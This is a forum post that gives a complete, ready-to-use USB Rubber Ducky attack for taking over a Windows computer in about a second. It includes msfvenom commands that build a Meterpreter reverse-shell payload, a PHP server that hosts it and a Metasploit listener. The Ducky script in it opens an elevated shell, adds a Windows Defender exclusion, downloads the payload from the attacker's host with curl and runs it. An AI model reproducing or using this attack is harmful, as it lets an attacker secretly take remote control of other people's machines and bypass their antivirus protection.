Jump to content

USB rubber ducky reverse shell in 1 second


Recommended Posts

So this is a usb rubber ducky attacking in roughly .9 to 2.3 seconds 

NOTE: THIS REQUIRES PORT FORWARDING ( to use your ip address public ip)

ports that need to be port forwarded 8888 & 8080

Heres the setup proc: (I use parrot sec os)

Create the payload

cd ~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your public ip> LPORT=8888 -f exe > exploit.exe

Start the PHP server

sudo php -S 0.0.0.0:8080 -t ~

Start your listener

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST <your public ip>
set LPORT 8888
set ExitOnSession false
exploit -j -z

Heres The Ducky Script

DELAY 350 
GUI r 
DELAY 100
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 150
ALT y
STRING powershell Add-MpPreference -ExclusionPath "C:\users"
ENTER
DELAY 100
STRING curl -o "C:\users\exploit.exe" "http://< your public ip>:8080/exploit.exe"
ENTER
DELAY 100
STRING start C:\users\exploit.exe 
ENTER
DELAY 100
STRING exit
ENTER

and done!

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...